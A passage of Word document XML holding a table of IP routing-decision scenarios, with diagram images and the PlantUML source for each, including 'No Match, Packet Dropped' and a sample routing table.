          </w:p>
          <w:p w14:paraId="40F616FF" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BDD1AEA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    #LightSkyBlue :Use default route;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C5E5A87" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (Uses gateway?) then (yes\n0.0.0.0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC3A683" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      #LightSkyBlue :Forward packet to next hop (192.168.1.254);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED7D5A3" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392BDD8E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      #LightGray :Send directly;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62DF567E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D060BAC" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BFA8E8A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="363B21CB" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="158C4489" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>stop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412E02CD" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D2E53CF" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>legend right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1551DDCE" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightSkyBlue = taken path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B6E4C2" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray    = not taken</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03728D71" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>endlegend</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA8ECE9" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="003E2459" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D3F1F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="092959BA" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EBD99B0" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scenario 4 – No Match, Packet Dropped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ABDA9D6" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="001D3F1F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E0CA9" w14:paraId="22ED9ACB" w14:textId="77777777" w:rsidTr="00DF4B7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1263E607" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34F51F5A" wp14:editId="3AC09663">
                  <wp:extent cx="6886050" cy="4611159"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1369521577"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2046" cy="4615174"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D7C4987" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="441D6F3F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam monochrome false</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3841AE5C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam activity {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ACADD88" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BackgroundColor white</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63A189A3" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BorderColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="472A2D3F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  FontColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3816AD78" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5909976E" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="600331B3" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>title Routing Decision – No Match, Packet Dropped</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75967897" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="289D2D85" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E81A1D" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Packet arrives with destination IP (203.0.113.45);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533E995C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="238E3B8F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Extract destination IP from packet header;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="228FAE53" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D1F63AA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>#LightSkyBlue :Search routing table for matching entries;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="383F75D5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="759836A1" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>note right</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B74BEEA" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Sample Routing Table:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78CCFDBB" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>Destination     Gateway         Genmask         Flags Metric Ref Use Iface</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B2EF055" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>192.168.1.0     0.0.0.0         255.255.255.0   U     0      0   200 eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C6E165" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>172.16.0.0      192.168.1.254   255.255.0.0     UG    75     0     5 eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C1A48D" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>end note</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D28C4A" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D5CE646" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>if (Exact host match found?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFADAC8" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  #LightGray :Send directly or via gateway;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A7EBD9" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="360F985C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (Network match found?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F54C190" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    #LightGray :Send via network route;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4192775F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AFA4AFC" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (Default route exists?) then (yes)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1B665C" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      #LightGray :Forward via default route;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3932B5D5" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    else (no)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6976811F" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">      #LightSkyBlue :No route found → Drop packet;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02446CD0" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">    endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="160F2648" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  endif</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3C4CE8" w14:textId="77777777" w:rsidR="009E0CA9" w:rsidRPr="00EA531F" w:rsidRDefault="009E0CA9" w:rsidP="00DF4B7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA531F">
              <w:rPr>
                <w:sz w:val="4"/>
